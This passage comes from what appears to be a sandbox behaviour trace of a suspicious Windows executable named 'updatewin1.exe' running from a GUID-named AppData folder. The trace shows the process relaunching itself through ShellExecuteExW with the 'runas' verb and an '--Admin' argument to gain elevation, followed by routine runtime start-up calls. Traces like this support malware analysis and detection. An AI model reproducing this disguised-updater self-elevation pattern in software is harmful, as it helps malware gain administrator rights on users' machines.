HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x50d2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" [0165.123] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xc0) returned 0x50d388 [0165.123] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" [0165.123] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned 1 [0165.123] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0165.123] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0166.199] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50d388 | out: hHeap=0x4e0000) returned 1 [0166.200] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0166.200] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0166.200] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50a0d0 | out: hHeap=0x4e0000) returned 1 [0166.200] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50cab0 | out: hHeap=0x4e0000) returned 1 [0166.200] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0166.200] GetLastError () returned 0x57 [0166.201] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0166.205] ExitProcess (uExitCode=0x0) [0166.207] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50a9e8 | out: hHeap=0x4e0000) returned 1 [0166.209] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 118 os_tid = 0x640 Thread: id = 119 os_tid = 0x2a8 Thread: id = 120 os_tid = 0x564 Thread: id = 121 os_tid = 0x560 Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" page_root = "0x38773000" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xacc" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0x700 [0167.290] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1a826100, dwHighDateTime=0x1d69ad5)) [0167.290] GetCurrentProcessId () returned 0xa74 [0167.290] GetCurrentThreadId () returned 0x700 [0167.290] GetTickCount () returned 0x1159242 [0167.290] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=28717023509) returned 1 [0167.290] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0167.290] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2e0000 [0167.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.292] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0167.292] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0167.292] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0167.292] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0167.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.293] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.293] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.293] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.293] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.294] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.294] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.294] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.295] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.295] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x214) returned 0x2e07d0 [0167.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.295] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.295] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.296] GetCurrentThreadId () returned 0x700 [0167.296] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0167.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x800) returned 0x2e09f0 [0167.296] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0167.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0167.296] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0167.296] SetHandleCount (uNumber=0x20) returned 0x20 [0167.296] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" --Admin" [0167.296] GetEnvironmentStringsW () returned 0x4e4e78* [0167.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0167.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x565) returned 0x2e11f8 [0167.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2e11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0167.296] FreeEnvironmentStringsW (penv=0x4e4e78) returned 1 [0167.296] GetLastError () returned 0x0 [0167.296] SetLastError (dwErrCode=0x0) [0167.296] GetLastError () returned 0x0 [0167.296] SetLastError (dwErrCode=0x0) [0167.296] GetLastError () returned 0x0 [0167.297] SetLastError (dwErrCode=0x0) [0167.297] GetACP () returned 0x4e4 [0167.297] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x220) returned 0x2e1768 [0167.297] GetLastError () returned 0x0 [0167.297] SetLastError (dwErrCode=0x0) [0167.297] IsValidCodePage (CodePage=0x4e4) returned 1 [0167.297] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0167.297] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0167.297] GetLastError () returned 0x0 [0167.297] SetLastError (dwErrCode=0x0) [0167.297] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0167.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0167.297] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0167.297] GetLastError () returned 0x0 [0167.297] SetLastError (dwErrCode=0x0) [0167.297] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0167.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ") returned 256 [0167.297] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0167.297] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0167.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x9bòµ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0167.297] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ") returned 256 [0167.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0167.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駁놈㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0167.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x9bòµ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0167.298] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js 